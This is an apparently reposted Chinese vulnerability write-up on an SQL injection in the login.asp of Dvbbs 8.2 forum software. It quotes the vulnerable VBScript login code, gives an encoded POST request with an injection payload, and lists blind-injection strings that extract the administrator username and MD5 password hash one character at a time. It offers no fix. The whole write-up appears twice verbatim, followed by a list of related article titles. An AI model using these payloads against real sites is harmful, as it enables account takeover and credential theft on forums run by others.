Dvbbs8.2 access/sql 版login.asp远程sql注入
来源:互联网 发布:隐马尔可夫模型算法 编辑:程序博客网 时间:2024/05/19 05:38
漏洞描述:
中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。
漏洞等级:
高危
漏洞分析:
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
Login.asp 代码片段
-----------------------------------------------------------------------------------------------------------------
Rem ==========论坛登录函数=========
Rem 判断用户登录
Function ChkUserLogin(username,password,mobile,usercookies,ctype)
Dim rsUser,article,userclass,titlepic
Dim userhidden,lastip,UserLastLogin
Dim GroupID,ClassSql,FoundGrade
Dim regname,iMyUserInfo
Dim sql,sqlstr,OLDuserhidden
FoundGrade=False
lastip=Dvbbs.UserTrueIP
userhidden=request.form("userhidden")
If userhidden <> "1" Then userhidden=2
ChkUserLogin=false
If mobile<>"" Then
sqlstr=" Passport='"&mobile&"'"
Else
sqlstr=" UserName='"&username&"'"
End If
Sql="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,lastlogin as cometime , LastLogin as activetime,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday,UserMoney,UserTicket,FollowMsgID,Vip_StarTime,Vip_EndTime,userid as boardid"
Sql=Sql & " From [Dv_User] Where "&sqlstr&""
set rsUser=Dvbbs.Execute(sql)
If rsUser.eof and rsUser.bof Then
'strString("本论坛不存在该用户名.@@@@0")
ChkUserLogin=False
Exit Function
Else
If rsUser("Lockuser") =1 Or rsUser("UserGroupID") =5 Then
ChkUserLogin=False
Exit Function
Else
If Trim(password)=Trim(rsUser("UserPassword")) Then
ChkUserLogin=True
Dvbbs.UserID=RsUser("UserID")
RegName = RsUser("UserName")
Article= RsUser("UserPost")
UserLastLogin = RsUser("cometime")
UserClass = RsUser("Userclass")
GroupID = RsUser("userGroupID")
OLDuserhidden=RsUser("UserHidden")
TitlePic = RsUser("UserTitle")
If Article < 0 Then Article=0
Set Dvbbs.UserSession=Dvbbs.RecordsetToxml(rsUser,"userinfo","xml")
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@cometime").text=Now()
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@activetime").text=DateAdd("s",-3600,Now())
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@boardid").text=0
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo").attributes.setNamedItem(Dvbbs.UserSession.createNode(2,"isuserpermissionall","")).text=Dvbbs.FoundUserPermission_All()
If OLDuserhidden <> CLng(userhidden) Then
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@userhidden").text=userhidden
Dvbbs.Execute("update Dv_user set userhidden="&userhidden&" where UserId=" & Dvbbs.UserID)
End If
Dim BS
Set Bs=Dvbbs.GetBrowser()
Dvbbs.UserSession.documentElement.appendChild(Bs.documentElement)
If EnabledSession Then Session(Dvbbs.CacheName & "UserID")=Dvbbs.UserSession.xml
Else
If ajaxPro Then
strString("用户名或者密码不正确.@@@@0")
End If
ChkUserLogin=False
Exit Function
End If
End If
End If
-----------------------------------------------------------------------------------------------------------------
漏洞利用:(access版)
由于使用验证码,该漏洞只能纯手工进行注入尝试,在用户登陆页面,用户名处构造sql语句
如:
判断
Where’ and ‘1’=’1
where’ and ‘1’=’2
密码任意6位,输入验证码,根据返回信息,第一条显示用户名或密码错误第二条显示无此用户,猜解用户
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1
……………………….
……………………
…………………….
猜解密码(md5加密)
where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1
where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1
……………………
……………………
…………………..
简单测试官方sql版也存在漏洞,利用过程不写了
中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。
漏洞等级:
高危
漏洞分析:
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
Login.asp 代码片段
-----------------------------------------------------------------------------------------------------------------
Rem ==========论坛登录函数=========
Rem 判断用户登录
Function ChkUserLogin(username,password,mobile,usercookies,ctype)
Dim rsUser,article,userclass,titlepic
Dim userhidden,lastip,UserLastLogin
Dim GroupID,ClassSql,FoundGrade
Dim regname,iMyUserInfo
Dim sql,sqlstr,OLDuserhidden
FoundGrade=False
lastip=Dvbbs.UserTrueIP
userhidden=request.form("userhidden")
If userhidden <> "1" Then userhidden=2
ChkUserLogin=false
If mobile<>"" Then
sqlstr=" Passport='"&mobile&"'"
Else
sqlstr=" UserName='"&username&"'"
End If
Sql="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,lastlogin as cometime , LastLogin as activetime,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday,UserMoney,UserTicket,FollowMsgID,Vip_StarTime,Vip_EndTime,userid as boardid"
Sql=Sql & " From [Dv_User] Where "&sqlstr&""
set rsUser=Dvbbs.Execute(sql)
If rsUser.eof and rsUser.bof Then
'strString("本论坛不存在该用户名.@@@@0")
ChkUserLogin=False
Exit Function
Else
If rsUser("Lockuser") =1 Or rsUser("UserGroupID") =5 Then
ChkUserLogin=False
Exit Function
Else
If Trim(password)=Trim(rsUser("UserPassword")) Then
ChkUserLogin=True
Dvbbs.UserID=RsUser("UserID")
RegName = RsUser("UserName")
Article= RsUser("UserPost")
UserLastLogin = RsUser("cometime")
UserClass = RsUser("Userclass")
GroupID = RsUser("userGroupID")
OLDuserhidden=RsUser("UserHidden")
TitlePic = RsUser("UserTitle")
If Article < 0 Then Article=0
Set Dvbbs.UserSession=Dvbbs.RecordsetToxml(rsUser,"userinfo","xml")
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@cometime").text=Now()
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@activetime").text=DateAdd("s",-3600,Now())
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@boardid").text=0
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo").attributes.setNamedItem(Dvbbs.UserSession.createNode(2,"isuserpermissionall","")).text=Dvbbs.FoundUserPermission_All()
If OLDuserhidden <> CLng(userhidden) Then
Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@userhidden").text=userhidden
Dvbbs.Execute("update Dv_user set userhidden="&userhidden&" where UserId=" & Dvbbs.UserID)
End If
Dim BS
Set Bs=Dvbbs.GetBrowser()
Dvbbs.UserSession.documentElement.appendChild(Bs.documentElement)
If EnabledSession Then Session(Dvbbs.CacheName & "UserID")=Dvbbs.UserSession.xml
Else
If ajaxPro Then
strString("用户名或者密码不正确.@@@@0")
End If
ChkUserLogin=False
Exit Function
End If
End If
End If
-----------------------------------------------------------------------------------------------------------------
漏洞利用:(access版)
由于使用验证码,该漏洞只能纯手工进行注入尝试,在用户登陆页面,用户名处构造sql语句
如:
判断
Where’ and ‘1’=’1
where’ and ‘1’=’2
密码任意6位,输入验证码,根据返回信息,第一条显示用户名或密码错误第二条显示无此用户,猜解用户
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1
……………………….
……………………
…………………….
猜解密码(md5加密)
where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1
where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1
……………………
……………………
…………………..
简单测试官方sql版也存在漏洞,利用过程不写了
- Dvbbs8.2 access/sql 版login.asp远程sql注入
- dvbbs8.2SQL-dZx 注意
- ASP+ACCESS SQL注入漏洞修复代码
- asp+access sql手工注入步骤
- SQL注入系列之ASP+ACCESS手动注入(一)----数字型
- SQL 注入之ACCESS
- Access SQL注入参考
- Access SQL注入参考
- Access SQL注入参考
- sql注入 access篇
- SQL注入系列之ASP+ACCESS手动注入(二)----Cookie注入
- SQL注入Access导出WebShell?
- SQL注入Access导出WebShell
- Access数据库SQL注入小结
- asp sql 防注入
- asp 防止SQL注入
- asp sql 注入
- ASP中的SQL注入
- 将分解的C++RPG引擎分配到VC++6.0 DirectX9.0 AppWizard项目中
- SQL SERVER 2005 下启动sa用户和修改sa的密码
- 渗透心得之----如何和管理员捉迷藏
- Oracle July 2006 Security Update Multiple Vulnerabilities
- ZJU1733 Common Subsequence - 最长公共子序列
- Dvbbs8.2 access/sql 版login.asp远程sql注入
- webshell下查找所有IIS站点配置
- 无限级javascript树形菜单
- 编译与部署Eclipse+Tomcat+MySQL+Liferay4.1.2
- Cookie注入手工检测方法
- 有时间读下
- 风讯CMS4.0sp5 商业版的致命伤
- EXT核心API详解(一)
- EXT核心API详解(二)Array类
